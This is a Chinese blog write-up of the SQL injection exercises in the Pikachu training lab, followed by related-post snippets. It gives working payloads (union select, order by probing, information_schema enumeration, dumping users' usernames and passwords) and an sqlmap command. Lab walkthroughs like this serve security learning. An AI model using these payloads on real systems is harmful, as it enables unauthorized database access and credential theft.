pikachu-sql注入

已于 2023-04-05 16:46:27 修改
阅读量576 收藏 3
点赞数 1
文章标签: sql mysql
于 2023-04-01 18:41:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Resets_/article/details/129901110
版权

pikachu-sql注入(1)

数字型注入(post)

本题看似查询选项只有6个,用burp抓取后修改id为7,得到lili的email:

image-20220920191004905

如果在源码中增加echo $query,则可以在网页中直接查看搜索的sql语句;

image-20230401152726315.png

image-20230401152825323.png

用burp 抓包将id改为1 union select 1,2 from users得到下图:

再把1,2分别变成username和password得到users的信息

就显示了管理员的账户和密码了。

字符型注入(get)

(1)注入点的确定

输入asd通过url确定注入点为name:

(2)确定字段数

使用order by确定网页查询字段的数量:

学习order by:https://blog.csdn.net/wangyuxiang946/article/details/121058067

因为查询的是和上题一样的表:通过输入kobe’ order by 1 #来进行确认,不断改变后面数字,确定字段数

学习注释符:SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索 - impulse- - 博客园 (cnblogs.com)

确定只有两个字段数:

通过查看源码发现确实查询的是两个字段:

(3)确定数据库名和表名

使用联合查询:kobe’ union select database(),version() #

得到数据库名:pikachu
sql版本号5.7.26

5.0以上的版本,才存在information_schema表,这张表保存了 Mysql 服务器所有数据库的信息,如数据库名,数据库的表等信息

输入kobe’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

GROUP_CONCAT()函数将组中的字符串连接成为具有各种选项的单个字符串

得到pikachu的表的名称:

(4)获得表中字段名

用户信息藏在users表中,查字段1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’#

得到:

(5)获取账号密码

输入:1’ union select username,password from users#

即可得到账户密码

学习来自大佬:

(38条消息) pikachu字符型注入_祚1的博客-CSDN博客

(38条消息) pikachu之字符型sql注入详细过程_捭阖~的博客-CSDN博客
符型sql注入详细过程_捭阖~的博客-CSDN博客](https://blog.csdn.net/m0_54024658/article/details/116993237)

Resets_
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
pikachu平台之sql注入
qq_42728977的博客
12-24 721
参考链接 原理 SQL注入漏洞,主要是开发人员在构建代码时,没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一种漏洞。 基本流程 1.2SQL注入攻击流程 第一步:注入点探测 自动方式:使用web漏洞扫描工具,自动进行注入点发现 手动方式:手工构造SQL注入测试语句进行注入点发现 第二步:信息获取 通过...
【信息安全】pikachu-SQL注入
Nicky_Zheng的博客
09-02 368
数字型注入 使用 1 or 1=1#探测,使用burpsuite截断post请求,修改提交的请求 使用 1 or 1=2#探测,使用burpsuite截断post请求,修改提交的请求 说明该处存在SQL注入 接下来需要使用order by 判断列数 oder by 2返回结果正常,说明只有2列 确认列数后,可使用union select获取数据库名、用户名 1 union select database(),user()# 通过information_schema获取当前数据库表名 根据表名
pikachuSQL注入
qq_58091216的博客
11-04 2307
SQL注入SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。
pikachu闯关(一)---数字型注入
最新发布
weixin_75034911的博客
07-04 838
pikachu中是通过单选下拉进行选择提交,可以通过html中下拉选择的节点,进行注入。
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2685
Pikachu-----Sql Inject(SQL注入
pikachu靶场通关之sql注入
qq_74825121的博客
01-21 2669
pikachu靶场通关之sql注入
pikachu靶场之SQL注入
2201_75766364的博客
03-28 992
程序员在编写web程序时,没有对客户端提交的参数进行严格的过滤和判断。用户可以修改参数或数据,并传递至服务器端,导致服务端拼接了伪造的SQL查询语句,服务端连接数据库,并将伪造的sql语句发送给数据库服务端执行,数据库将sql语句的执行结 果,返回给了服务端,服务端又将结果返回给了客户端,从而获取到敏感信息,甚至执行危险的代码或 系统命令。简单来说就是:注入产生的原因是接受相关参数未经处理直接带入数据库查询操作。
PIKACHU-SQL注入(1-5)
koala_king的博客
03-03 172
sql
pikachu-master.zip
06-25
Pikachu靶场中,你可以学习如何识别SQL注入漏洞,以及使用各种技巧防止此类攻击。 2. XSS(跨站脚本):这种漏洞允许攻击者在用户浏览器上执行恶意脚本,可能导致个人信息被窃取或网站被劫持。靶场会教你如何防御...
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
Pikachu---SQL注入
从不专注的人的博客
07-05 2295
概述 什么是SQL注入漏洞 注入(SQLi)是一种注入攻击,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;可以绕过网页或Web应用程序的身份验证和授权,并检索整个SQL数据库的内容;还可以使用SQL注入来添加,修改和删除数据库中的记录。 SQL注入漏洞可能会影响使用SQL数据库(如MySQL,Oracle,SQL Server或其他)的任何网站或Web应用程序。犯罪分子可能会利用它来未经授
Pikachu(皮卡丘)靶场中SQL注入
剁椒鱼头没剁椒的博客
12-14 5088
1)宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个 字符是一个汉字(前一个 ascii 码要大于 128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql 会调用转义函数,将单引号变为’,其中\的十 六进制是%5c,mysql 的 GBK 编码,会认为%df%5c 是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。输入kobe’ and 1=1#的时候页面正常,并且kobe’ and 1=2#页面不正常,证明使用单引号闭合。
PIKACHU--SQL注入
鲨鱼辣椒的博客
05-17 1544
SQL Inject(SQL)概述 注入漏洞在全球漏洞排行榜上一直高居榜首而注入漏洞中首当其冲的就是数据库注入漏洞,SQL注入漏洞主要的成因是子啊数据交互中,前端数据传入到后台处理时,没有做严格的过滤,导致传入后台的“数据”拼接到SQL语句中后,被当成SQL语句的一部分执行,从而产生与原本语句截然不同的意思,导致数据库受损(被脱裤、删除、甚至整个服务器权限沦陷) SQL注入流程 注入点探测 手动方式:手工构造SQL语句进行注入点发现 自动方式:采用自动扫描工具,自动进行注入点发现 信息获取 通过
pikachusql注入
weixin_38720471的博客
01-07 3790
** 1原理 ** SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 2数字型注入 让id=true,从而使sql语句在查询时,id可以查询所有值 3字符型注入 3.1原理:首先用 ’ 判断是否存在字符型注入的漏洞 。因为在sql语句中 多个’会造成sql语句错误(结合sql语句),若加单引号后显示sql运行错误 ,则存在此
PikachuSQL注入
qq_46430168的博客
06-29 420
PikachuSQL注入 1. 数字型注入       首先发现界面只有一个下拉框和提交框,尝试选择不同下拉框中的选项,发现返回不同的值,但是url并无任何变化,初步推断出使用post传输并且后台语句可能为select xxx,xxx from xxx where id=1-6。       找列数,id=3 order by n#,当n>2时返回错误,等于2时返回正确,说明select语句查询结果有2列     &n
PiKachuSql (SQL注入)通关 2022
av11566的博客
04-18 8298
遇到一个待测点: 1、判断是否有注入(判断是否未严格校验)-->第一要素 1)可控参数的改变能否影响页面显示结果。 2)输入的SQL语句是否能报错-能通过数据库的报错,看到数据库的一些语句痕迹(select username, password from user where id = 4 and 0#3)输入的SQL语句能否不报错-我们的语句能够成功闭合 2、什么类型的注入 3、语句是否能够被恶意修改--第二个要素 4、是否能够成功执行-->第三个要素 5、获取我们想要的数据。
一文了解pikachuSQL注入
allintao的博客
03-01 2748
本文章主要讲解关于pikachu的注入方式。目录一、数字型注入(post)二、字符型注入(get)三、搜索型注入四、xx型注入五、"insert/update"注入六、"delete"注入七、"http header"注入八、盲注(base on boolian)九、盲注(base on time)十、宽字节注入。
pikachu练习——sql注入
haoaaao的博客
01-30 2178
一、字符型注入(get) (1)随便输入name,获取url: 因pikachu登录需要用户名及密码,所以查询网页cookie绕过: (2)使用sqlmap查找该网站数据库: python sqlmap.py -u "http://127.0.0.1:8083/vul/sqli/sqli_str.php?name=123&submit=查询" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; security=low" --dbs --
pikachu通关sql注入
06-21
<< SQL注入是一种常见的网络安全漏洞,攻击者通过精心构造的SQL查询语句,试图欺骗应用程序或数据库管理系统执行非授权的操作。"Pikachu"并不是一个直接相关的术语,但如果我们假设你想了解如何使用SQL注入技术,通常这涉及到以下几个步骤: 1. **理解目标**:首先,你需要知道你要攻击的应用程序连接到哪个数据库以及它的查询结构。 2. **识别输入点**:Pikachu(皮卡丘)通常是指游戏中的角色,但在安全语境下,可能指的是用户输入的地方,比如搜索框或表单字段。 3. **构造恶意查询**:利用`UNION`、`LIKE`、`OR`等关键词,结合用户输入,创建一条包含恶意SQL的查询。例如,如果你的目标是获取所有用户数据,可能会构造一个类似这样的查询: ```sql SELECT * FROM users WHERE username = 'pikachu' OR '1'='1'; -- 这里'pikachu'是用户输入,'1'='1'是永远为真的条件 ``` 4. **测试和调整**:尝试这个查询,如果成功,可能会返回不应公开的数据。如果不成功,可能需要调整输入或尝试其他类型的注入。 5. **防御措施**:避免SQL注入的关键在于对用户输入进行验证和转义,使用参数化查询或预编译语句,以及保持数据库软件的最新更新。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值